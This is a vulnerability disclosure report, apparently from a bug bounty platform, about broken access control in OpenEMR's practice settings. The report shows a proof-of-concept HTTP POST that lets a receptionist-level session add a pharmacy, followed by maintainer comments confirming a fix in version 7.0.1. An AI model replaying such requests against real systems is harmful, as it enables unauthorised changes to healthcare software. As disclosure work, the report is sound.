Broken Access Controls in Pratice settings in openemr/openemr

Valid

Reported on

Dec 26th 2022

Description

We observed that a receptionist user can add a Pharmacy in the Pratice Settings section, although this area is restricted to receptionist users.

Proof of Concept

REQUEST:

POST /openemr/controller.php?practice_settings&pharmacy&action=edit HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=<receptionist user's cookie>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: https://demo.openemr.io
Referer: https://demo.openemr.io/openemr/controller.php?practice_settings&pharmacy&action=edit

form_id=&name=test_pharmarcy&address_line1=11&address_line2=11&city=&state=&zip=&email=&phone=&fax=&npi=&ncpdp=&transmit_method=1&id=&process=true

RESPONSE:

HTTP/1.1 302 Found
Server: nginx/1.21.1
Date: Mon, 26 Dec 2022 09:02:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/8.0.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /openemr/controller.php?practice_settings&pharmacy&action=list
Content-Length: 9246

<!DOCTYPE html>
<html>
<head>
    <title>Practice Settings</title>

    
<meta charset="utf-8" />
...

PoC Image

image

After we send the request above image

there is a new pharmacy added image

Impact

This vulnerability allows a front desk user to add any pharmacy, which could break the logic of the application.

We are processing your report and will contact the openemr team within 24 hours. a year ago
We have contacted a member of the openemr team and are waiting to hear back a year ago
openemr/openemr maintainer has acknowledged this report a year ago
Brady Miller validated this vulnerability a year ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Brady Miller
a year ago

Maintainer

This is fixed is in master branch at https://github.com/openemr/openemr/commit/bb4244c83a74628faafabc0598366f49863914a9

@Nhien.IT, @admin, I am unable to mark this as fixed, since that requires hard-setting a publish date, which I am unable to safely predict. We plan to release OpenEMR 7.0.1 in about 3-4 weeks, which will include this fix. At that time (after release OpenEMR 7.0.1), we will then mark this issue as fixed (and publish at that time with a cve).

thanks for the report @Nhien.IT !

Nhien.IT
a year ago

Researcher

Hi @maintainer,

Thanks for your effort, I hope to publish a fix version soon.

Regards.

Nhien.IT
7 months ago

Researcher

Hi @maintainer,

I have received mail about 7.0.1 version being published.Any update here?

Brady Miller marked this as fixed in 7.0.1 with commit bb4244 7 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Brady Miller published this vulnerability 7 months ago
to join this conversation